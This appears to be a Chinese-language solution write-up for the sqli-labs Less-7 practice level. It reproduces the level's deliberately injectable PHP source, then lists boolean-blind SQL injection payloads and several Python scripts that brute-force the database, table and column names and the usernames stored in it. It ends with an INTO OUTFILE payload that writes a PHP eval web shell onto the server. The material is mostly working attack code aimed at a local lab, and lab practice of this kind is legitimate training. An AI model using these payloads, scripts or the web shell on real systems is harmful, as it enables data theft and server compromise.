<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-7 Dump into Outfile</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#FFFF00">';
echo 'You are in.... Use outfile......';
echo "<br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
echo 'You have an error in your SQL syntax';
//print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-7.jpg" /></center>
</body>
</html>
第一种方法:布尔盲注
?id=1(返回这样: You are in.... Use outfile......)
?id=1 and 1=2(正常回显,不是数字型,现在还哪有什么数字型啊,都可以不试了)
?id=1'(报错)
?id=1'--+(依然报错)
?id=1"(正常)
?id=1" and "1"="1(正常)
?id=1" and "1"="2(正常,不对劲,不是双引号)
?id=1')--+(错误)
?id=1'))--+(正常)
?id=1')) and 1=1--+(正常)
?id=1')) and 1=2--+(错误)
这里因为除了两个页面以外,其他什么都不显示,所以用bool盲注测试。(这里只演示爆破语句,python脚本附在后面)
?id=1')) and length((select database()))=8--+(回显正常,说明当前数据库名的长度是8)
?id=1')) and ascii(substr((select database()),1,1))=115--+(回显正常,说明数据库名字第一个字母的ASCII码为115)
?id=1')) and (select count(table_name) from information_schema.tables where table_schema=database())=4--+(爆破表的个数)
?id=1')) and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=6--+(爆破表名的长度)
?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1))=1--+(爆破表名)
?id=1')) and (select count(column_name) from information_schema.columns where table_name='users'and table_schema=database())=3--+(爆列数)
?id=1')) and length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1))=2--+(爆破列名长度)
?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),0,1))=1--+(爆破列名)
接下来就是爆破数据了:
?id=1')) and (select count(username) from users)=13--+(爆破有多少条数据 #是从0开始的# )
?id=1')) and length(substr((select username from users limit 0,1),1))=1--+(判读数据长度)
?id=1')) and ascii(substr((select username from users limit 0,1),1,1))=1--+(爆破数据)
判断数据库名长度:
#coding:utf-8
import requests
from bs4 import BeautifulSoup
response=requests.session()
url ='http://localhost/sqli-labs-master/Less-7'
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
for i in range(1,30):
payload="?id=1')) and length((select database()))={}--+".format(i)
if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
print(i)
break
print("ok")
爆破数据库名:
#coding:utf-8
import requests
from bs4 import BeautifulSoup
response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
print(ord('s'))
database_length=8
database_name=""
for i in range(1,database_length+1):
for j in range(1,128):
payload="?id=1')) and ascii(substr((select database()),{},1))={}--+".format(i,j)
if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
database_name = database_name+chr(j)
break
print(database_name)
爆破表的个数
#coding:utf-8
import requests
from bs4 import BeautifulSoup
url="http://localhost/sqli-labs-master/Less-7/"
database_name="security"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
response=requests.session()
for i in range(1,20):
payload="?id=1')) and (select count(table_name) from information_schema.tables where table_schema=database())={}--+".format(i)
if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
table_number=i
break
print("table numbers:",table_number)
爆破表名长度:
#coding:utf-8
import requests
from bs4 import BeautifulSoup
response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
table_number=4
for i in range(0,4):
table_name=""
for j in range(1,50):
payload="?id=1')) and length(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),1))={}--+".format(i,j)
if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
tablelen=j
break
print(tablelen)
爆破表名:
#coding:utf-8
import requests
from bs4 import BeautifulSoup
response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
table_number=4
for i in range(0,4):
table_name=""
for j in range(1,50):
payload="?id=1')) and length(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),1))={}--+".format(i,j)
if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
tablelen=j
break
print(tablelen)
for m in range(0,tablelen+1):
for n in range(1,128):
name_payload="?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={}--+".format(i,m,n)
if "You are in.... Use outfile......" in response.get(url+name_payload,headers=headers).text:
table_name=table_name+chr(n)
break
print("表名:",table_name)
爆破列数:
#coding:utf-8
import requests
from bs4 import BeautifulSoup
response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
for i in range(1,30):
payload="?id=1')) and (select count(column_name) from information_schema.columns where table_name='users'and table_schema=database())={}--+".format(i)
if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
column_number=i
break
print("列数:", column_number)
爆破列名长度:
#coding:utf-8
import requests
from bs4 import BeautifulSoup
response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
column_number=3
for num in range(0,column_number):
for i in range(1,50):
payload="?id=1')) and length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),1))={}--+".format(num,i)
if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
print("{}列名长度为:".format(num+1),i)
break
爆破列名:
#coding:utf-8
import requests
from bs4 import BeautifulSoup
response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
column_number=3
for num in range(0,column_number):
column_name=""
for i in range(1,50):
payload="?id=1')) and length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),1))={}--+".format(num,i)
if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
column_length=i
break
for m in range(1,column_length+1):
for n in range(1,128):
name_payload="?id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),{},1))={}--+".format(num,m,n)
if "You are in.... Use outfile......" in response.get(url+name_payload,headers=headers).text:
column_name=column_name+chr(n)
break
print("第{}列的列名:".format(num+1),column_name)
爆破数据条数:
#coding:utf-8
import requests
from bs4 import BeautifulSoup
response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
for i in range(1,499):
payload="?id=1')) and (select count(username) from users)={}--+".format(i)
if "You are in.... Use outfile......" in response.get(url+payload,headers=headers).text:
print(i)
break
爆破数据内容:
#coding:utf-8
import requests
from bs4 import BeautifulSoup
response=requests.session()
url="http://localhost/sqli-labs-master/Less-7/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
Numbers=13
for i in range(0,Numbers):
shujv=""
for j in range(1,30):
payload="?id=1')) and length(substr((select username from users limit {},1),1))={}--+".format(i,j)
if "You are in.... Use outfile......"in response.get(url+payload,headers=headers).text:
shujv_length=j
break
for m in range(1,shujv_length+1):
for n in range(1,128):
shujv_payload="?id=1')) and ascii(substr((select username from users limit {},1),{},1))={}--+".format(i,m,n)
if "You are in.... Use outfile......" in response.get(url+shujv_payload,headers=headers).text:
shujv=shujv+chr(n)
break
print("第{}条数据:".format(i+1),shujv)
第二种方法:SQL注入写shell脚本
1、获取绝对路径:
要写shell那么我们就要知道文件的绝对路径。因为靶场是我们自己配置的,所以可以知道。再有就是可以在less1~6中用@@datadir查询。
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,@@datadir--+
我这里是:E:\PHPStudy\phpstudy_pro\WWW\sqli-labs-master\Less-7
id=1')) and (select count(*) from mysql.user)>0 --+
用这个判断是否返回正常,如果正常就有文件读取权限,反之则没有,需要配置。
2、写shell
?id=1')) union select 1,2,'<?php @eval($_POST["shell"]); ?>' into outfile "E:\\PHPStudy\\phpstudy_pro\\WWW\\test.php"--+
然后蚁剑连一下就好了